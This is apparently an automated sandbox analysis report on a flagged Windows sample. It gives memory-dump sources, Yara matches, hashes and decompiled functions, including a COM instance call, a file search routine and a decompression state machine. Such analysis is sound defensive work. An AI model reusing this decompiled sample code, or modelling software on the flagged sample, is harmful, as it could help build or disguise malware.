                                                  • Associated: 00000000.00000002.764445556.0000000073200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764465355.0000000073204000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764476426.0000000073206000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73200000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID:
                                                  • API String ID: 245916457-0
                                                  • Opcode ID: a917b94e8c37a9609881795849683793c6258db859a045fbf0e82ac7f5670ab0
                                                  • Instruction ID: 36fe83d7793e128a36a14e58950b9bd9d8e4a8133570b2eff4f831aef1e20e4e
                                                  • Opcode Fuzzy Hash: a917b94e8c37a9609881795849683793c6258db859a045fbf0e82ac7f5670ab0
                                                  • Instruction Fuzzy Hash: 1A229B79E1030ADFDB119FA4C5847AEB7B9FB08305F14852ED166E2280E7B4A6C9CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1t($8qaN$EHC($J"R$hy{d$p[1G$t{z
                                                  • API String ID: 0-1583444602
                                                  • Opcode ID: 141ef2828880df74eef53f8fcbf04790a034a219c49a5d9bee243e81a1ae59b0
                                                  • Instruction ID: 1c6a89d7fa0c8c2d8275230f6dcdae6885b443162085a8228c8ce145a852884f
                                                  • Opcode Fuzzy Hash: 141ef2828880df74eef53f8fcbf04790a034a219c49a5d9bee243e81a1ae59b0
                                                  • Instruction Fuzzy Hash: 74B200716083899FDB74CF38CD987DABBB2BF56310F49816ADC899B255C7308A41CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID: 1t($8qaN$EHC($t{z
                                                  • API String ID: 2167126740-1518202417
                                                  • Opcode ID: ae2d8a17190248f6c95c06a3ab433b74f22e9282f3df8f7ea028a5edb7f367a4
                                                  • Instruction ID: b4186ae976f7c185e574d173bff6b86b671bc39dfcd043677432944814bd995a
                                                  • Opcode Fuzzy Hash: ae2d8a17190248f6c95c06a3ab433b74f22e9282f3df8f7ea028a5edb7f367a4
                                                  • Instruction Fuzzy Hash: 1772EEB26443899FDB749F39CD857DABBB2FF59300F45812AED899B210C7305A85CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1t($8qaN$EHC($t{z
                                                  • API String ID: 0-1518202417
                                                  • Opcode ID: 71c984391edea0196c1ac7763db2bcd4086f55da743c762c923612ac0f3e24b2
                                                  • Instruction ID: da2db84b5003869a23a95b1548a58b71d0984624a103f87002c1fb7ecd2a57d4
                                                  • Opcode Fuzzy Hash: 71c984391edea0196c1ac7763db2bcd4086f55da743c762c923612ac0f3e24b2
                                                  • Instruction Fuzzy Hash: 5A42ECB26047899FDB749F39CD847DABBB2FF59310F558129EC899B210C7309A85CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ?t|)$`
                                                  • API String ID: 0-1336213114
                                                  • Opcode ID: bc6f7f978e2e5d22f22b889bd7cefc61671ef5d4b19d70ff0acb579584d92b35
                                                  • Instruction ID: 82b94da209ff709375d84f23d5abba8d29b1af62c43cb75d6c75728591b3891f
                                                  • Opcode Fuzzy Hash: bc6f7f978e2e5d22f22b889bd7cefc61671ef5d4b19d70ff0acb579584d92b35
                                                  • Instruction Fuzzy Hash: 5A21D372A443988BEF34DE7998953DF77A2BF58350F94806ADD0D9E145EB3005818B51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 67%
                                                  			E004021AA(void* __eflags) {
                                                  				signed int _t52;
                                                  				void* _t56;
                                                  				intOrPtr* _t60;
                                                  				intOrPtr _t61;
                                                  				intOrPtr* _t62;
                                                  				intOrPtr* _t64;
                                                  				intOrPtr* _t66;
                                                  				intOrPtr* _t68;
                                                  				intOrPtr* _t70;
                                                  				intOrPtr* _t72;
                                                  				intOrPtr* _t74;
                                                  				intOrPtr* _t76;
                                                  				intOrPtr* _t78;
                                                  				intOrPtr* _t80;
                                                  				void* _t83;
                                                  				intOrPtr* _t91;
                                                  				signed int _t101;
                                                  				signed int _t105;
                                                  				void* _t107;
                                                  
                                                  				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                  				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                  				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                  				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                  				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                  				_t52 =  *(_t107 - 0x20);
                                                  				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                  				_t101 = _t52 & 0x00008000;
                                                  				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                  				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                  				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                  					E00402DA6(0x21);
                                                  				}
                                                  				_t56 = _t107 + 8;
                                                  				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                                                  				if(_t56 < _t83) {
                                                  					L14:
                                                  					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                  					_push(0xfffffff0);
                                                  				} else {
                                                  					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                  					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                  					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                  					if(_t61 >= _t83) {
                                                  						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                  						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                  						if(_t101 == _t83) {
                                                  							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                  							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
                                                  						}
                                                  						if(_t105 != _t83) {
                                                  							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                  							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                  						}
                                                  						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                  						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                  						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                  						if( *_t91 != _t83) {
                                                  							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                  							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                  						}
                                                  						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                  						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                  						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                  						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                  						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                  							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                  							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                  						}
                                                  						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                  						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                  					}
                                                  					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                  					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                  					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                  						_push(0xfffffff4);
                                                  					} else {
                                                  						goto L14;
                                                  					}
                                                  				}
                                                  				E00401423();
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                  				return 0;
                                                  			}






















                                                  0x004021b3
                                                  0x004021bd
                                                  0x004021c7
                                                  0x004021d1
                                                  0x004021dc
                                                  0x004021df
                                                  0x004021f9
                                                  0x004021fc
                                                  0x00402202
                                                  0x00402205
                                                  0x0040220f
                                                  0x00402213
                                                  0x00402213
                                                  0x00402218
                                                  0x00402229
                                                  0x00402231
                                                  0x004022e8
                                                  0x004022e8
                                                  0x004022ef
                                                  0x00402237
                                                  0x00402237
                                                  0x00402246
                                                  0x0040224a
                                                  0x0040224d
                                                  0x00402253
                                                  0x00402261
                                                  0x00402264
                                                  0x00402266
                                                  0x00402271
                                                  0x00402271
                                                  0x00402276
                                                  0x00402278
                                                  0x0040227f
                                                  0x0040227f
                                                  0x00402282
                                                  0x0040228b
                                                  0x0040228e
                                                  0x00402294
                                                  0x00402296
                                                  0x004022a0
                                                  0x004022a0
                                                  0x004022a3
                                                  0x004022ac
                                                  0x004022af
                                                  0x004022b8
                                                  0x004022be
                                                  0x004022c0
                                                  0x004022ce
                                                  0x004022ce
                                                  0x004022d1
                                                  0x004022d7
                                                  0x004022d7
                                                  0x004022da
                                                  0x004022e0
                                                  0x004022e6
                                                  0x004022fb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004022e6
                                                  0x004022f1
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID:
                                                  • API String ID: 542301482-0
                                                  • Opcode ID: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
                                                  • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                  • Opcode Fuzzy Hash: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
                                                  • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E0040290B(short __ebx, short* __edi) {
                                                  				void* _t21;
                                                  
                                                  				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                  					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                  					_push(_t21 - 0x2b0);
                                                  					_push(__edi);
                                                  					E0040653D();
                                                  				} else {
                                                  					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                  					 *__edi = __ebx;
                                                  					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                  				return 0;
                                                  			}




                                                  0x00402923
                                                  0x0040293e
                                                  0x00402949
                                                  0x0040294a
                                                  0x00402a94
                                                  0x00402925
                                                  0x00402928
                                                  0x0040292b
                                                  0x0040292e
                                                  0x0040292e
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
                                                  • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                  • Opcode Fuzzy Hash: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
                                                  • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &r,E
                                                  • API String ID: 0-3438234993
                                                  • Opcode ID: db9c0a553eeaef294d14956ebfa76605cc1e373ce85aacd643507caccfad0d0e
                                                  • Instruction ID: 3d5b8c36e32f206594f02782ddc53f0b2c3ecb23e12f7ea91cdc0026f82a391f
                                                  • Opcode Fuzzy Hash: db9c0a553eeaef294d14956ebfa76605cc1e373ce85aacd643507caccfad0d0e
                                                  • Instruction Fuzzy Hash: 28B1AE7164038ADFEF749F25CD84BDE37A7BF55300F80852ADD4AAB254EB318A818B11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: hy{d
                                                  • API String ID: 0-48387667
                                                  • Opcode ID: 64bb01b6fbd031a8a0f56fcc5e49238406e68d07892bae608872c9acac177ec3
                                                  • Instruction ID: 07ac8676bad458482e1e85a634e516cb853656798142ffd6b8553dbd4e2f4e38
                                                  • Opcode Fuzzy Hash: 64bb01b6fbd031a8a0f56fcc5e49238406e68d07892bae608872c9acac177ec3
                                                  • Instruction Fuzzy Hash: DBB1E4615083D58ECB35CF388C9CB96BFA1AF52320F5982AAC8999F2D7D7348542C712
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764364094.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a50000_9u4xTDR5bG.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: hy{d
                                                  • API String ID: 0-48387667
                                                  • Opcode ID: 4de66c49ddde163c653628ccae35de11a51555130fde50a7554d6ea68e9e553f
                                                  • Instruction ID: 8828755b08cea4e120c031a8e9c53edb728d2b0908e6998b237a5b5b734b2144
                                                  • Opcode Fuzzy Hash: 4de66c49ddde163c653628ccae35de11a51555130fde50a7554d6ea68e9e553f
                                                  • Instruction Fuzzy Hash: 4B41C4729082D4CBCF35CF388C987EABBA1AF55360F4982AACC995F385D7344641C722
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 79%
                                                  			E00406D85(signed int __ebx, signed int* __esi) {
                                                  				signed int _t396;
                                                  				signed int _t425;
                                                  				signed int _t442;
                                                  				signed int _t443;
                                                  				signed int* _t446;
                                                  				void* _t448;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					_t446 = __esi;
                                                  					_t425 = __ebx;
                                                  					if( *(_t448 - 0x34) == 0) {
                                                  						break;
                                                  					}
                                                  					L55:
                                                  					__eax =  *(__ebp - 0x38);
                                                  					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  					__ecx = __ebx;
                                                  					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  					__ebx = __ebx + 8;
                                                  					while(1) {
                                                  						L56:
                                                  						if(__ebx < 0xe) {
                                                  							goto L0;
                                                  						}
                                                  						L57:
                                                  						__eax =  *(__ebp - 0x40);
                                                  						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                  						__ecx = __eax;
                                                  						__esi[1] = __eax;
                                                  						__ecx = __eax & 0x0000001f;
                                                  						if(__cl > 0x1d) {
                                                  							L9:
                                                  							_t443 = _t442 | 0xffffffff;
                                                  							 *_t446 = 0x11;
                                                  							L10:
                                                  							_t446[0x147] =  *(_t448 - 0x40);
                                                  							_t446[0x146] = _t425;
                                                  							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                  							L11:
                                                  							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                  							_t446[0x26ea] =  *(_t448 - 0x30);
                                                  							E004074F4( *(_t448 + 8));
                                                  							return _t443;
                                                  						}
                                                  						L58:
                                                  						__eax = __eax & 0x000003e0;
                                                  						if(__eax > 0x3a0) {
                                                  							goto L9;
                                                  						}
                                                  						L59:
                                                  						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                  						__ebx = __ebx - 0xe;
                                                  						_t94 =  &(__esi[2]);
                                                  						 *_t94 = __esi[2] & 0x00000000;
                                                  						 *__esi = 0xc;
                                                  						while(1) {
                                                  							L60:
                                                  							__esi[1] = __esi[1] >> 0xa;
                                                  							__eax = (__esi[1] >> 0xa) + 4;
                                                  							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                  								goto L68;
                                                  							}
                                                  							L61:
                                                  							while(1) {
                                                  								L64:
                                                  								if(__ebx >= 3) {
                                                  									break;
                                                  								}
                                                  								L62:
                                                  								if( *(__ebp - 0x34) == 0) {
                                                  									goto L182;
                                                  								}
                                                  								L63:
                                                  								__eax =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  								__ecx = __ebx;
                                                  								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  								__ebx = __ebx + 8;
                                                  							}
                                                  							L65:
                                                  							__ecx = __esi[2];
                                                  							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                  							__ebx = __ebx - 3;
                                                  							_t108 = __ecx + 0x4084d4; // 0x121110
                                                  							__ecx =  *_t108;
                                                  							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                  							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                  							__ecx = __esi[1];
                                                  							__esi[2] = __esi[2] + 1;
                                                  							__eax = __esi[2];
                                                  							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                  							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                  								goto L64;
                                                  							}
                                                  							L66:
                                                  							while(1) {
                                                  								L68:
                                                  								if(__esi[2] >= 0x13) {
                                                  									break;
                                                  								}
                                                  								L67:
                                                  								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                                                  								__eax =  *_t119;
                                                  								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                  								_t126 =  &(__esi[2]);
                                                  								 *_t126 = __esi[2] + 1;
                                                  							}
                                                  							L69:
                                                  							__ecx = __ebp - 8;
                                                  							__edi =  &(__esi[0x143]);
                                                  							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                  							__eax = 0;
                                                  							 *(__ebp - 8) = 0;
                                                  							__eax =  &(__esi[3]);
                                                  							 *__edi = 7;
                                                  							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                  							if(__eax != 0) {
                                                  								L72:
                                                  								 *__esi = 0x11;
                                                  								while(1) {
                                                  									L180:
                                                  									_t396 =  *_t446;
                                                  									if(_t396 > 0xf) {
                                                  										break;
                                                  									}
                                                  									L1:
                                                  									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                  										case 0:
                                                  											L101:
                                                  											__eax = __esi[4] & 0x000000ff;
                                                  											__esi[3] = __esi[4] & 0x000000ff;
                                                  											__eax = __esi[5];
                                                  											__esi[2] = __esi[5];
                                                  											 *__esi = 1;
                                                  											goto L102;
                                                  										case 1:
                                                  											L102:
                                                  											__eax = __esi[3];
                                                  											while(1) {
                                                  												L105:
                                                  												__eflags = __ebx - __eax;
                                                  												if(__ebx >= __eax) {
                                                  													break;
                                                  												}
                                                  												L103:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L182;
                                                  												}
                                                  												L104:
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  												__ecx = __ebx;
                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L106:
                                                  											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                  											__eax = __eax &  *(__ebp - 0x40);
                                                  											__ecx = __esi[2];
                                                  											__eax = __esi[2] + __eax * 4;
                                                  											__ecx =  *(__eax + 1) & 0x000000ff;
                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                  											__ecx =  *__eax & 0x000000ff;
                                                  											__eflags = __ecx;
                                                  											if(__ecx != 0) {
                                                  												L108:
                                                  												__eflags = __cl & 0x00000010;
                                                  												if((__cl & 0x00000010) == 0) {
                                                  													L110:
                                                  													__eflags = __cl & 0x00000040;
                                                  													if((__cl & 0x00000040) == 0) {
                                                  														goto L125;
                                                  													}
                                                  													L111:
                                                  													__eflags = __cl & 0x00000020;
                                                  													if((__cl & 0x00000020) == 0) {
                                                  														goto L9;
                                                  													}
                                                  													L112:
                                                  													 *__esi = 7;
                                                  													goto L180;
                                                  												}
                                                  												L109:
                                                  												__esi[2] = __ecx;
                                                  												__esi[1] = __eax;
                                                  												 *__esi = 2;
                                                  												goto L180;
                                                  											}
                                                  											L107:
                                                  											__esi[2] = __eax;
                                                  											 *__esi = 6;
                                                  											goto L180;
                                                  										case 2:
                                                  											L113:
                                                  											__eax = __esi[2];
                                                  											while(1) {
                                                  												L116:
                                                  												__eflags = __ebx - __eax;
                                                  												if(__ebx >= __eax) {
                                                  													break;
                                                  												}
                                                  												L114:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L182;
                                                  												}
                                                  												L115:
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  												__ecx = __ebx;
                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L117:
                                                  											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                  											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                  											__ecx = __eax;
                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  											__ebx = __ebx - __eax;
                                                  											__eflags = __ebx;
                                                  											__eax = __esi[4] & 0x000000ff;
                                                  											__esi[3] = __esi[4] & 0x000000ff;
                                                  											__eax = __esi[6];
                                                  											__esi[2] = __esi[6];
                                                  											 *__esi = 3;
                                                  											goto L118;
                                                  										case 3:
                                                  											L118:
                                                  											__eax = __esi[3];
                                                  											while(1) {
                                                  												L121:
                                                  												__eflags = __ebx - __eax;
                                                  												if(__ebx >= __eax) {
                                                  													break;
                                                  												}
                                                  												L119:
                                                  												__eflags =  *(__ebp - 0x34);
                                                  												if( *(__ebp - 0x34) == 0) {
                                                  													goto L182;
                                                  												}
                                                  												L120:
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                  												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                  												__ecx = __ebx;
                                                  												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                  												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                  												__ebx = __ebx + 8;
                                                  												__eflags = __ebx;
                                                  											}
                                                  											L122:
                                                  											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                  											__eax = __eax &  *(__ebp - 0x40);
                                                  											__ecx = __esi[2];
                                                  											__eax = __esi[2] + __eax * 4;
                                                  											__ecx =  *(__eax + 1) & 0x000000ff;
                                                  											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                  											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                  											__ecx =  *__eax & 0x000000ff;
                                                  											__eflags = __cl & 0x00000010;
                                                  											if((__cl & 0x00000010) == 0) {
                                                  												L124:
                                                  												__eflags = __cl & 0x00000040;
                                                  												if((__cl & 0x00000040) != 0) {
                                                  													goto L9;
                                                  												}
                                                  												L125:
                                                  												__esi[3] = __ecx;
                                                  												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                  												__esi[2] = __eax;
                                                  												goto L180;
                                                  											}
